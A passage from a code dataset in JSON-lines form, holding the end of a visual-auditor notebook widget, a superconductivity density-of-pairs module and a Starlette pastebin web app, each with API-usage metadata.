Loss\\\", \\\"Hours Per Week\\\", \\\"Country\\\"]\"\n elif (prefix == 'gc_'):\n features_str = \"[\\\"Checking Account\\\", \\\"Duration\\\", \\\"Credit History\\\", \\\"Purpose\\\", \\\"Credit Amount\\\", \\\"Savings Account\\\", \\\"Employment\\\", \\\"Installment Rate\\\", \\\"Relationship/Sex\\\", \\\"Debtors/Guarantors\\\", \\\"Residence Since\\\", \\\"Property\\\", \\\"Age\\\", \\\"Installment Plans\\\", \\\"Housing\\\", \\\"Existing Credits\\\", \\\"Job\\\", \\\"Maintenance\\\", \\\"Telephone\\\", \\\"Foreign\\\"]\"\n elif (prefix == 'cp_'):\n features_str = \"[\\\"State\\\", \\\"Account Length\\\", \\\"Area Code\\\", \\\"International\\\", \\\"Voicemail Plan\\\", \\\"Voicemail Messages\\\", \\\"Day Minutes\\\", \\\"Day Calls\\\", \\\"Day Charge\\\", \\\"Eve Minutes\\\", \\\"Eve Calls\\\", \\\"Eve Charge\\\", \\\"Night Minutes\\\", \\\"Night Calls\\\", \\\"Night Charge\\\", \\\"Intl Minutes\\\", \\\"Intl Calls\\\", \\\"Intl Charge\\\", \\\"CustServ Calls\\\"]\"\n else:\n features_str = \"[]\"\n\n html_str = html_str.replace('[\"insert dataset features\"]', features_str)\n\n html_str = html.escape(html_str)\n\n iframe_id = 'visual-auditor-iframe-' + str(int(random.random() * 1e8))\n\n iframe = '''\n \n '''.format(html_str, iframe_id)\n\n display_html(iframe, raw=True)", "repo_name": "poloclub/visual-auditor", "sub_path": "visual-auditor-package/notebook-widget/visual_auditor/visual_auditor.py", "file_name": "visual_auditor.py", "file_ext": "py", "file_size_in_byte": 25609, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": 
"31", "api": [{"api_name": "numpy.sum", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 22, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 23, "usage_type": "call"}, {"api_name": "scipy.stats.norm.cdf", "line_number": 25, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 25, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 25, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 38, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 110, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 164, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 167, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 169, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 193, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 196, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 198, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 210, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 217, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 220, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 222, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 231, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 237, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 256, "usage_type": "call"}, {"api_name": "sklearn.metrics.log_loss", "line_number": 261, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 263, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 271, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 272, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 272, "usage_type": "attribute"}, {"api_name": "functools.partial", "line_number": 273, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 273, "usage_type": "attribute"}, {"api_name": "functools.partial", "line_number": 274, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 274, "usage_type": "attribute"}, {"api_name": "sklearn.metrics.log_loss", "line_number": 275, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 277, "usage_type": "call"}, {"api_name": "sklearn.metrics.log_loss", "line_number": 278, "usage_type": "argument"}, {"api_name": "functools.partial", "line_number": 280, "usage_type": "call"}, {"api_name": "concurrent.futures.futures.ProcessPoolExecutor", "line_number": 287, "usage_type": "call"}, {"api_name": "concurrent.futures.futures", "line_number": 287, "usage_type": "attribute"}, {"api_name": "concurrent.futures", "line_number": 287, "usage_type": "name"}, {"api_name": "concurrent.futures.futures.as_completed", "line_number": 294, "usage_type": "call"}, {"api_name": "concurrent.futures.futures", "line_number": 294, "usage_type": "attribute"}, {"api_name": "concurrent.futures", "line_number": 294, "usage_type": 
"name"}, {"api_name": "numpy.mean", "line_number": 310, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 326, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 332, "usage_type": "call"}, {"api_name": "concurrent.futures.futures.ThreadPoolExecutor", "line_number": 353, "usage_type": "call"}, {"api_name": "concurrent.futures.futures", "line_number": 353, "usage_type": "attribute"}, {"api_name": "concurrent.futures", "line_number": 353, "usage_type": "name"}, {"api_name": "concurrent.futures.futures.as_completed", "line_number": 364, "usage_type": "call"}, {"api_name": "concurrent.futures.futures", "line_number": 364, "usage_type": "attribute"}, {"api_name": "concurrent.futures", "line_number": 364, "usage_type": "name"}, {"api_name": "scipy.stats.mstats.mquantiles", "line_number": 397, "usage_type": "call"}, {"api_name": "scipy.stats.mstats", "line_number": 397, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 397, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 398, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 406, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 406, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 433, "usage_type": "call"}, {"api_name": "html.escape", "line_number": 440, "usage_type": "call"}, {"api_name": "random.random", "line_number": 442, "usage_type": "call"}, {"api_name": "IPython.display.display_html", "line_number": 454, "usage_type": "call"}, {"api_name": "pkgutil.get_data", "line_number": 470, "usage_type": "call"}, {"api_name": "html.escape", "line_number": 477, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 484, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 487, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 491, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 495, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 499, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 503, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 507, "usage_type": "call"}, {"api_name": "html.escape", "line_number": 511, "usage_type": "call"}, {"api_name": "random.random", "line_number": 514, "usage_type": "call"}, {"api_name": "IPython.display.display_html", "line_number": 527, "usage_type": "call"}, {"api_name": "sklearn.metrics.log_loss", "line_number": 543, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 544, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 544, "usage_type": "call"}, {"api_name": "sklearn.metrics.log_loss", "line_number": 566, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 567, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 567, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 589, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 592, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 595, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 598, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 601, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 604, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 607, "usage_type": "call"}, {"api_name": "html.escape", "line_number": 628, "usage_type": "call"}, {"api_name": "random.random", "line_number": 630, "usage_type": "call"}, {"api_name": "IPython.display.display_html", "line_number": 642, 
"usage_type": "call"}]}
+{"seq_id": "4060741202", "text": "import numpy as np\nimport numba as nb\nfrom superconductivity.density_of_states import usadel_pairing_angle\n\n\ndef dop_bcs(en, delta, real=True):\n \"\"\"\n Compute the density of pairs for a generic BCS superconductor.\n Parameters\n ----------\n en: float, numpy.ndarray\n Energy relative to the fermi energy (E-Ef) in any units.\n delta: float\n Superconducting gap energy in units of en.\n real: boolean (optional)\n If False, the imaginary part of the complex valued function is\n returned. If True, the real part of the complex valued function\n is returned. The real part is the density of pairs. The default is\n True.\n Returns\n -------\n dop: numpy.ndarray\n density of pairs as a function of en\n \"\"\"\n en = np.atleast_1d(en)\n dop = np.empty(en.shape, dtype=np.complex)\n _dop(dop, en, delta, 0, real=real)\n return dop.real if real else dop.imag\n\n\ndef dop_dynes(en, delta, gamma, real=True):\n \"\"\"\n Compute the density of pairs for a Dynes superconductor. Functional\n form from Herman et al. Phys. Rev. B, 96, 1, 2017.\n (doi:10.1103/PhysRevB.96.014509)\n Parameters\n ----------\n en: float, numpy.ndarray\n Energy relative to the fermi energy (E-Ef) in any units.\n delta: float\n Superconducting gap energy in units of en.\n gamma: float (optional)\n Dynes parameter for broadening the density of states in units of en.\n real: boolean (optional)\n If False, the imaginary part of the complex valued function is\n returned. If True, the real part of the complex valued function\n is returned. The real part is the density of pairs. The default is\n True.\n Returns\n -------\n dop: numpy.ndarray\n density of pairs as a function of en\n \"\"\"\n en = np.atleast_1d(en)\n dop = np.empty(en.shape, dtype=np.complex)\n _dop(dop, en, delta, gamma, real=real)\n return dop.real if real else dop.imag\n\n\ndef dop_usadel(en, delta, alpha, real=True):\n \"\"\"\n Compute the density of pairs for an Usadel superconductor. Functional\n form from Coumou et al. Phys. Rev. B, 88, 18, 2013.\n (doi:10.1103/PhysRevB.88.180505)\n Parameters\n ----------\n en: float, numpy.ndarray\n Energy relative to the fermi energy (E-Ef) in any units.\n delta: float\n Superconducting gap energy in units of en.\n alpha: float\n The disorder-dependent pair-breaking parameter in units of en.\n real: boolean (optional)\n If False, the imaginary part of the complex valued function is\n returned. If True, the real part of the complex valued function\n is returned. The real part is the density of states. 
The default is\n        True.\n    Returns\n    -------\n    dop: numpy.ndarray\n        density of pairs as a function of en\n    \"\"\"\n    theta = usadel_pairing_angle(en, delta, alpha)\n    dop = np.sin(theta)\n    return dop.real if real else dop.imag\n\n\n@nb.njit(cache=True)\ndef _dop(data, en, delta, gamma, real=True):\n    zero = np.sqrt((en + 1j * gamma)**2 - delta**2) == 0\n    data[zero & (en > 0)] = np.inf if real else -1j * np.inf\n    data[zero & (en <= 0)] = -np.inf if real else -1j * np.inf\n    en_c = en[~zero] + 1j * gamma\n    data[~zero] = np.sign(en[~zero] + 1j) * delta / np.sqrt(en_c**2 - delta**2)\n", "repo_name": "zobristnicholas/superconductivity", "sub_path": "src/superconductivity/density_of_pairs.py", "file_name": "density_of_pairs.py", "file_ext": "py", "file_size_in_byte": 3307, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.atleast_1d", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.complex128", "line_number": 26, "usage_type": "attribute"}, {"api_name": "numpy.atleast_1d", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.complex128", "line_number": 55, "usage_type": "attribute"}, {"api_name": "superconductivity.density_of_states.usadel_pairing_angle", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 91, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 92, "usage_type": "attribute"}, {"api_name": "numpy.sign", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 94, "usage_type": "call"}, {"api_name": "numba.njit", "line_number": 88, "usage_type": "call"}]}
+{"seq_id": "1734897268", "text": "from starlette.applications import Starlette\nfrom starlette.responses import JSONResponse, RedirectResponse, PlainTextResponse, Response\nfrom starlette.config import Config\nfrom starlette.templating import Jinja2Templates\nfrom starlette.staticfiles import StaticFiles\nfrom starlette.middleware import Middleware\nfrom starlette.middleware.gzip import GZipMiddleware\nimport string\nimport random\nimport uuid\nfrom databases import Database\nfrom urllib.parse import unquote\nfrom pygments import highlight\nfrom pygments.lexers import guess_lexer\nfrom pygments.formatters import HtmlFormatter\nfrom hashlib import md5\n\nfrom app.authentication.Authenticator import UKAuthAuthenticator, BulkAuthenticator, CookieAuthenticator\nfrom app.storage.NoteStorage import LocalNoteStorage\nfrom app.models.Models import note, view as view_table, metadata\n\nconfig = Config(\".env\")\nDEBUG = config(\"DEBUG\", cast=bool, default=False)\nDATABASE_URL = config(\"DATABASE_URL\")\n\nmiddleware = [\n Middleware(GZipMiddleware, minimum_size=1000)\n]\n\napp = Starlette(debug=DEBUG, middleware=middleware)\ntemplates = Jinja2Templates(\"templates\")\napp.mount('/static', StaticFiles(directory='static'))\n\n\ndatabase = Database(DATABASE_URL)\n\nstorageBackend = LocalNoteStorage()\nauthenticator = BulkAuthenticator([UKAuthAuthenticator(), CookieAuthenticator()])\n\n\n@app.on_event(\"startup\")\nasync def startup():\n await database.connect()\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown():\n await database.disconnect()\n\n\n@app.route(\"/\")\nasync def root(req):\n claims = await authenticator.get_auth_claims(req)\n\n #TODO: .order_by()\n public_notes = await database.fetch_all(note.select().where(note.c.public == True).limit(10))\n\n public_and_views = [(pub_note, (await database.fetch_one(view_table.select().where(view_table.c.note_id == pub_note.id).alias(\"tmp\").count()))[0]) for pub_note in public_notes]\n\n if claims:\n user_notes = await database.fetch_all(note.select().where(note.c.owner == claims[\"userId\"]))\n return templates.TemplateResponse(\"main.html\", {\"request\": req, \"user\": claims, \"notes\": user_notes, \"public_notes\": public_and_views})\n else:\n previous_notes = [x[0].split(\"_\")[0] for x in filter(lambda x: \"_securityKey\" in x[0], req.cookies.items())]\n previous_notes_old = [(await database.fetch_one(note.select().where(note.c.note_id == note_id))) for note_id in previous_notes]\n\n if previous_notes_old:\n return templates.TemplateResponse(\"main.html\", {\"request\": req, \"user\": None, \"notes\": previous_notes_old, \"public_notes\": public_and_views})\n else:\n # User not logged in so redirect to new note\n location = \"\".join(random.choices(string.ascii_lowercase + string.digits, k=5))\n\n security_key = str(uuid.uuid4())\n\n await database.execute(note.insert(), values={\n \"file_name\": str(uuid.uuid4()),\n \"note_id\": location,\n \"security_key\": security_key,\n \"owner\": -1 if claims is None else claims[\"userId\"]\n })\n\n resp = templates.TemplateResponse(\"edit.html\", {\n \"request\": req,\n \"noteID\": location,\n \"content\": \"\",\n \"user\": claims\n })\n resp.set_cookie(f\"{location}_securityKey\", security_key)\n\n return resp\n\n\n@app.route(\"/edit/{note}\")\nasync def edit(req):\n claims = await authenticator.get_auth_claims(req)\n\n db_note = await database.fetch_one(note.select().where(note.c.note_id == req.path_params[\"note\"]))\n\n if db_note is None:\n return RedirectResponse(\"/\")\n\n if not await 
authenticator.can_access_resource(req, db_note):\n        return RedirectResponse(f\"/view/{db_note.note_id}\")\n\n    content = await storageBackend.get(db_note.file_name)\n\n    return templates.TemplateResponse(\"edit.html\", {\n        \"request\": req,\n        \"noteID\": db_note.note_id,\n        \"content\": content,\n        \"user\": claims\n    })\n\n\n@app.route(\"/view/{note}\")\nasync def view(req):\n\n    ip = req.client.host\n    try:\n        ip = req.headers['x-forwarded-for'] # Starlette exposes HTTP header names, not WSGI-style keys\n    except KeyError:\n        print(\"Not behind a proxy\")\n    ip_hashed = md5(ip.encode(\"UTF-8\")).hexdigest()\n    print(ip_hashed)\n\n    db_note = await database.fetch_one(note.select().where(note.c.note_id == req.path_params[\"note\"]))\n\n    if db_note is None:\n        return RedirectResponse(\"/\")\n\n    await database.execute(view_table.insert(), values={\n        \"note_id\": db_note.id,\n        \"visitor_id\": ip_hashed,\n    })\n\n    content_raw = await storageBackend.get(db_note.file_name)\n    content = highlight(content_raw, guess_lexer(content_raw), HtmlFormatter())\n\n    view_count = await database.fetch_one(view_table.select().where(view_table.c.note_id == db_note.id).alias(\"tmp\").count())\n\n    return templates.TemplateResponse(\"view.html\", {\n        \"request\": req,\n        \"content\": content,\n        \"contentRaw\": content_raw,\n        \"noteID\": db_note.note_id,\n        \"view_count\": view_count[0],\n        \"user\": await authenticator.get_auth_claims(req)\n    })\n\n\n@app.route(\"/view/{note}/raw\")\nasync def view_raw(req):\n    db_note = await database.fetch_one(note.select().where(note.c.note_id == req.path_params[\"note\"]))\n\n    if db_note is None:\n        return RedirectResponse(\"/\")\n\n    content = await storageBackend.get(db_note.file_name)\n\n    if not content:\n        return RedirectResponse(\"/\")\n\n    return PlainTextResponse(content, media_type=\"text/plain\")\n\n\n@app.route(\"/view/{note}/embed\")\nasync def view_oembed(req):\n    noteID = req.path_params[\"note\"]\n\n    db_note = await database.fetch_one(note.select().where(note.c.note_id == noteID))\n\n    content = await storageBackend.get(db_note.file_name)\n\n    content = highlight(content, guess_lexer(content), HtmlFormatter())\n\n    return JSONResponse({\n        \"version\": \"1.0\",\n        \"type\": \"rich\",\n        \"title\": noteID,\n        \"width\": 200,\n        \"height\": 200,\n        \"html\": content[:250]\n    })\n\n\n@app.route(\"/pygmentStyle\")\nasync def style(req):\n    return PlainTextResponse(HtmlFormatter().get_style_defs(\"#editor-pane\"), media_type=\"text/css\")\n\n\n@app.route(\"/newNote\")\nasync def new_note(req):\n    claims = await authenticator.get_auth_claims(req)\n\n    location = \"\".join(random.choices(string.ascii_lowercase + string.digits, k=5))\n    security_key = str(uuid.uuid4())\n    file_name = str(uuid.uuid4())\n\n    await database.execute(note.insert(), values={\n        \"file_name\": file_name,\n        \"note_id\": location,\n        \"security_key\": security_key,\n        \"owner\": -1 if claims is None else claims[\"userId\"]\n    })\n\n    await storageBackend.set(file_name, \"\")\n\n    resp = RedirectResponse(f\"/edit/{location}\")\n    resp.set_cookie(f\"{location}_securityKey\", security_key)\n    return resp\n\n\n# Consider using a websocket in future\n@app.route(\"/saveNote/{note}\", methods=[\"POST\"])\nasync def save_note(req):\n    # Get the file path for this note\n    json_data = await req.json()\n\n    db_note = await database.fetch_one(note.select().where(note.c.note_id == req.path_params[\"note\"]))\n\n    if not await authenticator.can_access_resource(req, db_note):\n        return Response(status_code=403)\n\n    await storageBackend.set(db_note.file_name, unquote(json_data[\"content\"]))\n\n    return 
JSONResponse({\n        \"Status\": 1\n    })\n\n\n@app.route(\"/note/{id}/set-public\")\nasync def set_note_public(req):\n    db_note = await database.fetch_one(note.select().where(note.c.note_id == req.path_params[\"id\"]))\n\n    if not await authenticator.can_access_resource(req, db_note):\n        return Response(status_code=403)\n\n    await database.execute(note.update().where(note.c.note_id == req.path_params[\"id\"]).values(public=True))\n\n    return Response(status_code=200)\n\n\n@app.route(\"/clone/{note}\", methods=[\"POST\"])\nasync def clone_note(req):\n    claims = await authenticator.get_auth_claims(req)\n\n    location = \"\".join(random.choices(string.ascii_lowercase + string.digits, k=5))\n    security_key = str(uuid.uuid4())\n    file_name = str(uuid.uuid4())\n\n    await database.execute(note.insert(), values={\n        \"file_name\": file_name,\n        \"note_id\": location,\n        \"security_key\": security_key,\n        \"owner\": -1 if claims is None else claims[\"userId\"]\n    })\n\n    original_note = await database.fetch_one(note.select().where(note.c.note_id == req.path_params[\"note\"]))\n    original_content = await storageBackend.get(original_note.file_name)\n    await storageBackend.set(file_name, original_content)\n\n    resp = PlainTextResponse(location)\n    resp.set_cookie(f\"{location}_securityKey\", security_key)\n    return resp\n", "repo_name": "CUB3D/QuickPasteRedux", "sub_path": "app/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 8635, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "starlette.config.Config", "line_number": 22, "usage_type": "call"}, {"api_name": "starlette.middleware.Middleware", "line_number": 27, "usage_type": "call"}, {"api_name": "starlette.middleware.gzip.GZipMiddleware", "line_number": 27, "usage_type": "argument"}, {"api_name": "app.authentication.Authenticator", "line_number": 30, "usage_type": "name"}, {"api_name": "starlette.applications.Starlette", "line_number": 30, "usage_type": "call"}, {"api_name": "starlette.templating.Jinja2Templates", "line_number": 31, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator.mount", "line_number": 32, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator", "line_number": 32, "usage_type": "name"}, {"api_name": "starlette.staticfiles.StaticFiles", "line_number": 32, "usage_type": "call"}, {"api_name": "databases.Database", "line_number": 35, "usage_type": "call"}, {"api_name": "app.storage.NoteStorage.LocalNoteStorage", "line_number": 37, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator.BulkAuthenticator", "line_number": 38, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator.UKAuthAuthenticator", "line_number": 38, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator.CookieAuthenticator", "line_number": 38, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator.on_event", "line_number": 41, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator", "line_number": 41, "usage_type": "name"}, {"api_name": "app.authentication.Authenticator.on_event", "line_number": 46, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator", "line_number": 46, "usage_type": "name"}, {"api_name": "app.models.Models.note.select", "line_number": 56, "usage_type": "call"}, {"api_name": "app.models.Models.note", "line_number": 56, "usage_type": "name"}, {"api_name": "app.models.Models.note.c", "line_number": 56, "usage_type": "attribute"}, {"api_name": 
"app.models.Models.view.select", "line_number": 58, "usage_type": "call"}, {"api_name": "app.models.Models.view", "line_number": 58, "usage_type": "name"}, {"api_name": "app.models.Models.view.c", "line_number": 58, "usage_type": "attribute"}, {"api_name": "app.models.Models.note.select", "line_number": 61, "usage_type": "call"}, {"api_name": "app.models.Models.note", "line_number": 61, "usage_type": "name"}, {"api_name": "app.models.Models.note.c", "line_number": 61, "usage_type": "attribute"}, {"api_name": "app.models.Models.note.select", "line_number": 65, "usage_type": "call"}, {"api_name": "app.models.Models.note", "line_number": 65, "usage_type": "name"}, {"api_name": "app.models.Models.note.c", "line_number": 65, "usage_type": "attribute"}, {"api_name": "random.choices", "line_number": 71, "usage_type": "call"}, {"api_name": "string.ascii_lowercase", "line_number": 71, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 71, "usage_type": "attribute"}, {"api_name": "uuid.uuid4", "line_number": 73, "usage_type": "call"}, {"api_name": "app.models.Models.note.insert", "line_number": 75, "usage_type": "call"}, {"api_name": "app.models.Models.note", "line_number": 75, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 76, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator.route", "line_number": 51, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator", "line_number": 51, "usage_type": "name"}, {"api_name": "app.models.Models.note.select", "line_number": 97, "usage_type": "call"}, {"api_name": "app.models.Models.note", "line_number": 97, "usage_type": "name"}, {"api_name": "app.models.Models.note.c", "line_number": 97, "usage_type": "attribute"}, {"api_name": "starlette.responses.RedirectResponse", "line_number": 100, "usage_type": "call"}, {"api_name": "starlette.responses.RedirectResponse", "line_number": 103, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator.route", "line_number": 93, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator", "line_number": 93, "usage_type": "name"}, {"api_name": "hashlib.md5", "line_number": 123, "usage_type": "call"}, {"api_name": "app.models.Models.note.select", "line_number": 126, "usage_type": "call"}, {"api_name": "app.models.Models.note", "line_number": 126, "usage_type": "name"}, {"api_name": "app.models.Models.note.c", "line_number": 126, "usage_type": "attribute"}, {"api_name": "starlette.responses.RedirectResponse", "line_number": 129, "usage_type": "call"}, {"api_name": "app.models.Models.view.insert", "line_number": 131, "usage_type": "call"}, {"api_name": "app.models.Models.view", "line_number": 131, "usage_type": "name"}, {"api_name": "pygments.highlight", "line_number": 137, "usage_type": "call"}, {"api_name": "pygments.lexers.guess_lexer", "line_number": 137, "usage_type": "call"}, {"api_name": "pygments.formatters.HtmlFormatter", "line_number": 137, "usage_type": "call"}, {"api_name": "app.models.Models.view.select", "line_number": 139, "usage_type": "call"}, {"api_name": "app.models.Models.view", "line_number": 139, "usage_type": "name"}, {"api_name": "app.models.Models.view.c", "line_number": 139, "usage_type": "attribute"}, {"api_name": "app.authentication.Authenticator.route", "line_number": 115, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator", "line_number": 115, "usage_type": "name"}, {"api_name": "app.models.Models.note.select", "line_number": 153, "usage_type": "call"}, {"api_name": 
"app.models.Models.note", "line_number": 153, "usage_type": "name"}, {"api_name": "app.models.Models.note.c", "line_number": 153, "usage_type": "attribute"}, {"api_name": "starlette.responses.RedirectResponse", "line_number": 156, "usage_type": "call"}, {"api_name": "starlette.responses.RedirectResponse", "line_number": 161, "usage_type": "call"}, {"api_name": "starlette.responses.PlainTextResponse", "line_number": 163, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator.route", "line_number": 151, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator", "line_number": 151, "usage_type": "name"}, {"api_name": "app.models.Models.note.select", "line_number": 170, "usage_type": "call"}, {"api_name": "app.models.Models.note", "line_number": 170, "usage_type": "name"}, {"api_name": "app.models.Models.note.c", "line_number": 170, "usage_type": "attribute"}, {"api_name": "pygments.highlight", "line_number": 174, "usage_type": "call"}, {"api_name": "pygments.lexers.guess_lexer", "line_number": 174, "usage_type": "call"}, {"api_name": "pygments.formatters.HtmlFormatter", "line_number": 174, "usage_type": "call"}, {"api_name": "starlette.responses.JSONResponse", "line_number": 176, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator.route", "line_number": 166, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator", "line_number": 166, "usage_type": "name"}, {"api_name": "starlette.responses.PlainTextResponse", "line_number": 188, "usage_type": "call"}, {"api_name": "pygments.formatters.HtmlFormatter", "line_number": 188, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator.route", "line_number": 186, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator", "line_number": 186, "usage_type": "name"}, {"api_name": "random.choices", "line_number": 195, "usage_type": "call"}, {"api_name": "string.ascii_lowercase", "line_number": 195, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 195, "usage_type": "attribute"}, {"api_name": "uuid.uuid4", "line_number": 196, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 197, "usage_type": "call"}, {"api_name": "app.models.Models.note.insert", "line_number": 199, "usage_type": "call"}, {"api_name": "app.models.Models.note", "line_number": 199, "usage_type": "name"}, {"api_name": "starlette.responses.RedirectResponse", "line_number": 208, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator.route", "line_number": 191, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator", "line_number": 191, "usage_type": "name"}, {"api_name": "app.models.Models.note.select", "line_number": 219, "usage_type": "call"}, {"api_name": "app.models.Models.note", "line_number": 219, "usage_type": "name"}, {"api_name": "app.models.Models.note.c", "line_number": 219, "usage_type": "attribute"}, {"api_name": "starlette.responses.Response", "line_number": 222, "usage_type": "call"}, {"api_name": "urllib.parse.unquote", "line_number": 224, "usage_type": "call"}, {"api_name": "starlette.responses.JSONResponse", "line_number": 226, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator.route", "line_number": 214, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator", "line_number": 214, "usage_type": "name"}, {"api_name": "app.models.Models.note.select", "line_number": 233, "usage_type": "call"}, {"api_name": "app.models.Models.note", "line_number": 233, "usage_type": "name"}, {"api_name": 
"app.models.Models.note.c", "line_number": 233, "usage_type": "attribute"}, {"api_name": "starlette.responses.Response", "line_number": 236, "usage_type": "call"}, {"api_name": "app.models.Models.note.update", "line_number": 238, "usage_type": "call"}, {"api_name": "app.models.Models.note", "line_number": 238, "usage_type": "name"}, {"api_name": "app.models.Models.note.c", "line_number": 238, "usage_type": "attribute"}, {"api_name": "starlette.responses.Response", "line_number": 240, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator.route", "line_number": 231, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator", "line_number": 231, "usage_type": "name"}, {"api_name": "random.choices", "line_number": 247, "usage_type": "call"}, {"api_name": "string.ascii_lowercase", "line_number": 247, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 247, "usage_type": "attribute"}, {"api_name": "uuid.uuid4", "line_number": 248, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 249, "usage_type": "call"}, {"api_name": "app.models.Models.note.insert", "line_number": 251, "usage_type": "call"}, {"api_name": "app.models.Models.note", "line_number": 251, "usage_type": "name"}, {"api_name": "app.models.Models.note.select", "line_number": 258, "usage_type": "call"}, {"api_name": "app.models.Models.note", "line_number": 258, "usage_type": "name"}, {"api_name": "app.models.Models.note.c", "line_number": 258, "usage_type": "attribute"}, {"api_name": "starlette.responses.PlainTextResponse", "line_number": 262, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator.route", "line_number": 243, "usage_type": "call"}, {"api_name": "app.authentication.Authenticator", "line_number": 243, "usage_type": "name"}]}
